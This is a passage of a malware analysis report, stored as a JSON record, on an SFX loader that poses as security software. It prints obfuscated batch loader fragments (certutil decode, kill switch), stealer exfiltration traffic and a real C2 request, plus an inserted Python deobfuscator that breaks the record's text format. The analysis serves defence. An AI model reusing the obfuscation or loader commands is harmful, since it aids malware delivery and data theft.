However, the code stays the same, with\r\nthe kill switch measures, the certutil command (with a random one-letter name for the script) and the launch of the\r\nAutoIt payload with the builder.\r\nSet Fx=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\r\n%Fx:~18,1%%Fx:~15,1% %computername% == %Fx:~39,1%%Fx:~40,1%%Fx:~54,1%%Fx:~46,1%%Fx:~55,1%%Fx:~50,1%%F\r\n\u003c%Fx:~23,1%%Fx:~30,1%%Fx:~21,1% %Fx:~28,1%%Fx:~14,1%%Fx:~29,1% /%Fx:~25,1% =\"%Fx:~48,1%\" \u003e %Fx:~28,1%\r\n%Fx:~29,1%%Fx:~34,1%%Fx:~25,1%%Fx:~14,1% %Fx:~35,1%%Fx:~56,1%%Fx:~26,1%%Fx:~28,1%.%Fx:~12,1%%Fx:~24,1\r\n%Fx:~13,1%%Fx:~14,1%%Fx:~21,1% %Fx:~35,1%%Fx:~56,1%%Fx:~26,1%%Fx:~28,1%.%Fx:~12,1%%Fx:~24,1%%Fx:~22,1\r\n%Fx:~12,1%%Fx:~14,1%%Fx:~27,1%%Fx:~29,1%%Fx:~30,1%%Fx:~29,1%%Fx:~18,1%%Fx:~21,1% -%Fx:~13,1%%Fx:~14,1\r\n%Fx:~28,1%%Fx:~22,1%%Fx:~28,1%%Fx:~28,1%.%Fx:~12,1%%Fx:~24,1%%Fx:~22,1% %Fx:~48,1%\r\n%Fx:~25,1%%Fx:~18,1%%Fx:~23,1%%Fx:~16,1% %Fx:~1,1%%Fx:~2,1%%Fx:~7,1%.%Fx:~0,1%.%Fx:~0,1%.%Fx:~1,1% -%\r\nThis variant also sometimes changes the header of the PE builder, removing part of the magic number\r\nor all of it, to avoid triggering detection rules that require a valid PE (fix it\r\nby restoring the missing part, \"M\" or \"MZ\").\r\nAutoit script\r\nThe obfuscation stays the same, with unused functions and a While/Switch construct to get the shellcode\r\nto inject; this can decode the binaries (like Taurus) or just execute another shellcode decoded in\r\nmemory.\r\nData extraction\r\nAs said previously, many RATs and stealers have been found on this loader.\r\nRAT Redline (XML, excerpt) :\r\n\u003ca:WebBaseGlVendor\u003eUNKNOWN\u003c/a:WebBaseGlVendor\u003e\r\n\u003ca:WebBaseGlVersion\u003eUNKNOWN\u003c/a:WebBaseGlVersion\u003e\r\n\u003ca:WebDebugGlRenderer\u003eUNKNOWN\u003c/a:WebDebugGlRenderer\u003e\r\n\u003ca:WebDebugGlVendor\u003eUNKNOWN\u003c/a:WebDebugGlVendor\u003e\u003c/a:FingerPrint\u003e\r\n\u003ca:HWID\u003e7CAAB55F3C2D7D2AA0AD7BDE756AC65A\u003c/a:HWID\u003e\r\n\u003ca:IP\u003eIP Victim\u003c/a:IP\u003e\r\n\u003ca:IsProcessElevated\u003efalse\u003c/a:IsProcessElevated\u003e\r\n\u003ca:Location\u003eLocation Victim\u003c/a:Location\u003e\r\n\u003ca:LogDate\u003e0001-01-01T00:00:00\u003c/a:LogDate\u003e\r\n\u003ca:MonitorSize\u003e1280x720\u003c/a:MonitorSize\u003e\r\n\u003ca:OS\u003eWindows 7 Professional x32\u003c/a:OS\u003e\r\n\u003ca:PostalCode\u003eUNKNOWN\u003c/a:PostalCode\u003e\r\n\u003ca:Screenshot\u003eiVBORw0KGgoAAAANSUhEUg ...\r\n\u003ca:TimeZone\u003eUTC+01:00:00\u003c/a:TimeZone\u003e\r\n\u003ca:Username\u003eadmin\u003c/a:Username\u003e\u003c/user\u003e\u003c/SendClientInfo\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\nVariant Autoit Injector (Base 64 + custom algorithm)\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; 
name=\"BRElVD1NTQ==\"\r\nIQomRj5dSxwxBj89HANdNw==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"BRElVCNZVAo=\"\r\nLxcuWCMYfQ4ZJA==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"ExsgVQ==\"\r\nB0x+V3xZDlpYJ2YpF1gJW35yPDUAR11SB1IHTHoGKA5cV1sjM39AV1kOfCZrYlVCXVQHDwZJKgcsC1oOCyBvdw==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"ExsgXytX\"\r\nQwRpOwRWTQoBbQVmUy1XGS1rDRwaVANSGQBXSHkRDmhsTy1lZWFEXn8jMmMlcQd+SlwUAlNBfxEAWgJPTU9mfTJXAF1+AG5mdzE=\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"ABc8Xzk=\"\r\nUg==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"Bw5wRQxe\"; filename=\"LxcuWCMYfQ4ZJA==\"\r\nContent-Type: application/octet-stream\r\nCoinMiner 1ms0rry Botnet (HTTP)\r\nGET /cmd.php?hwid=C4BA3647 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0\r\nHost: cq17178.tmweb.ru\r\n\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.16.1\r\nDate: xxx\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 1\r\nConnection: keep-alive\r\nSet-Cookie: PHPSESSID=da19fc7e571fde73afc839a4b684260f; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\n1\r\nMany other stealers and RATs are used as well; the domains and IPs are used only briefly, as expected for a mass campaign.\r\nhttps://urlhaus.abuse.ch/url/407605/\r\nWe can note that, like the initial sample which impersonates the Malwarebytes solution, this one impersonates other security solutions or Windows programs (here, Internet Explorer).
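The batch obfuscation shown earlier (a long alphabet stored with Set Fx=... and every character of each command read back through %Fx:~n,1% substring expansion) can be undone mechanically. The following Python deobfuscator is an added example written for this page, not code from the original report or the loader's author. The sample script embedded in it is constructed in the same style as the loader's script: the one-letter script name M, the smss.com drop name and the ping count are assumptions, not values from the analysed sample. It also expands plain %VAR% references, which the loader uses for its hostname kill switch, and leaves undefined names such as %computername% literal so the analyst still sees what the script compares against.

```python
import re

# Added example (not from the original report): undo the cmd.exe substring
# obfuscation used by the loader's batch script, where a long alphabet is stored
# in a variable and every character of each command is read back via %VAR:~n,1%.

# The alphabet used by the report's script (digits, lowercase, uppercase).
ALPHABET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'

# cmd.exe expansion forms handled: %VAR:~START,LEN% (substring) and %VAR% (plain).
# Delayed !VAR! expansion and negative offsets are not implemented.
SUBSTR_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*):~([0-9]+),([0-9]+)%')
PLAIN_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)%')
# A plain assignment: Set NAME=VALUE (case-insensitive; does not match set /p or set /a).
SET_RE = re.compile(r'(?i)^set +([A-Za-z_][A-Za-z0-9_]*)=(.*)$')

# Constructed sample in the style of the report's script. The script name M, the
# smss.com drop name and the ping count are assumptions, not values from the sample.
SAMPLE_SCRIPT = '''Set Fx=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
Set K=Q
if %computername% == DESKTOP-%K%UO5%K%U33 exit
%Fx:~12,1%%Fx:~14,1%%Fx:~27,1%%Fx:~29,1%%Fx:~30,1%%Fx:~29,1%%Fx:~18,1%%Fx:~21,1% -%Fx:~13,1%%Fx:~14,1%%Fx:~12,1%%Fx:~24,1%%Fx:~13,1%%Fx:~14,1% %Fx:~48,1% %Fx:~28,1%%Fx:~22,1%%Fx:~28,1%%Fx:~28,1%.%Fx:~12,1%%Fx:~24,1%%Fx:~22,1%
%Fx:~25,1%%Fx:~18,1%%Fx:~23,1%%Fx:~16,1% -%Fx:~23,1% %Fx:~3,1% %Fx:~1,1%%Fx:~2,1%%Fx:~7,1%.%Fx:~0,1%.%Fx:~0,1%.%Fx:~1,1%
'''


def expand_line(line, env):
    # Expand references against env (keys lowercased, as cmd.exe names are
    # case-insensitive). Unknown names such as %computername% are left literal.
    def substr(m):
        name, start, length = m.group(1).lower(), int(m.group(2)), int(m.group(3))
        if name not in env:
            return m.group(0)
        return env[name][start:start + length]

    def plain(m):
        return env.get(m.group(1).lower(), m.group(0))

    return PLAIN_RE.sub(plain, SUBSTR_RE.sub(substr, line))


def deobfuscate(script):
    # Walk the script top to bottom, expanding each line with the variables seen
    # so far and recording every Set NAME=VALUE assignment as it appears.
    env = {}
    decoded = []
    for raw in script.splitlines():
        line = expand_line(raw.strip(), env)
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)
        decoded.append(line)
    return decoded


# Post-decoding triage: the commands the report describes for this loader.
INDICATORS = (
    ('certutil', 'certutil decodes the embedded payload'),
    ('set /p', 'set /p with redirection rewrites the stripped MZ header'),
    ('ping ', 'ping used as a sleep before the next stage'),
    ('%computername%', 'hostname kill switch'),
)


def flag_indicators(lines):
    # Returns (line_number, needle, reason) for each decoded line hitting an indicator.
    hits = []
    for number, line in enumerate(lines, 1):
        low = line.lower()
        for needle, reason in INDICATORS:
            if needle in low:
                hits.append((number, needle, reason))
    return hits


if __name__ == '__main__':
    decoded = deobfuscate(SAMPLE_SCRIPT)
    for number, line in enumerate(decoded, 1):
        print(number, line)
    for hit in flag_indicators(decoded):
        print('  indicator:', hit)
```

Run against the constructed sample, the fourth line decodes to certutil -decode M smss.com and the fifth to ping -n 3 127.0.0.1, and the kill-switch line becomes if %computername% == DESKTOP-QUO5QU33 exit, which is the string to look for in your own telemetry. The expansion is done before the Set check on each line so that assignments whose own value is built from earlier variables are handled too.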
Fake 7z SFX Internet Explorer\r\nThis looks more like a Loader-as-a-Service (LaaS) offering, or the same threat actor using it for a mass campaign to resell accounts and leaks on the markets. These target individuals and companies with fake software and maldocs.\r\nAll the matching TTPs can be consulted here.\r\nThe coder of the loader used quite a few posts from Russian forums when designing the configuration and script of the SFX archive.\r\nCyber kill chain\r\nThis process graph represents the cyber kill chain used by the attacker.\r\nIndicators Of Compromise (IOC)\r\nThe IOCs can be exported in JSON and CSV.\r\nReferences MITRE ATT\u0026CK Matrix\r\nEnterprise tactics | Techniques used | Ref URL\r\nExecution | Command-Line Interface | https://attack.mitre.org/techniques/T1059\r\nExecution | Execution through API | https://attack.mitre.org/techniques/T1106\r\nExecution | Execution through Module Load | https://attack.mitre.org/techniques/T1129\r\nPersistence | Registry Run Keys / Startup Folder | https://attack.mitre.org/techniques/T1060\r\nDefense Evasion | Deobfuscate/Decode Files or Information | https://attack.mitre.org/techniques/T1140\r\nCredential Access | Credential Dumping | https://attack.mitre.org/techniques/T1003\r\nCredential Access | Credentials in Files | https://attack.mitre.org/techniques/T1081\r\nDiscovery | Query Registry | https://attack.mitre.org/techniques/T1012\r\nDiscovery | System Information Discovery | https://attack.mitre.org/techniques/T1082\r\nThis can be exported in JSON format (Export in JSON).\r\nLinks\r\nOriginal 
tweet:\r\nhttps://twitter.com/Artilllerie/status/1299249738764689413\r\nhttps://twitter.com/JAMESWT_MHT/status/1301536610606100481\r\nAnyRun links:\r\nMalwarebytes-Setup.exe\r\nDr.Fone_v3.8.exe\r\nReferences:\r\n7-Zip SFX Modified Module Wiki (Russian)\r\n7-Zip SFX Modified Module\r\nTaurus stealer analysis\r\nMSE flag (BlackHat conference)\r\nWindows Process Injection: KnownDlls Cache Poisoning\r\nSame reference of the loader\r\nSource: https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
	],
	"report_names": [
		"Analysis.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775434075,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0a1a3c85e85c093eda159ff17b7f40e6aee999a6.pdf",
		"text": "https://archive.orkl.eu/0a1a3c85e85c093eda159ff17b7f40e6aee999a6.txt",
		"img": "https://archive.orkl.eu/0a1a3c85e85c093eda159ff17b7f40e6aee999a6.jpg"
	}
}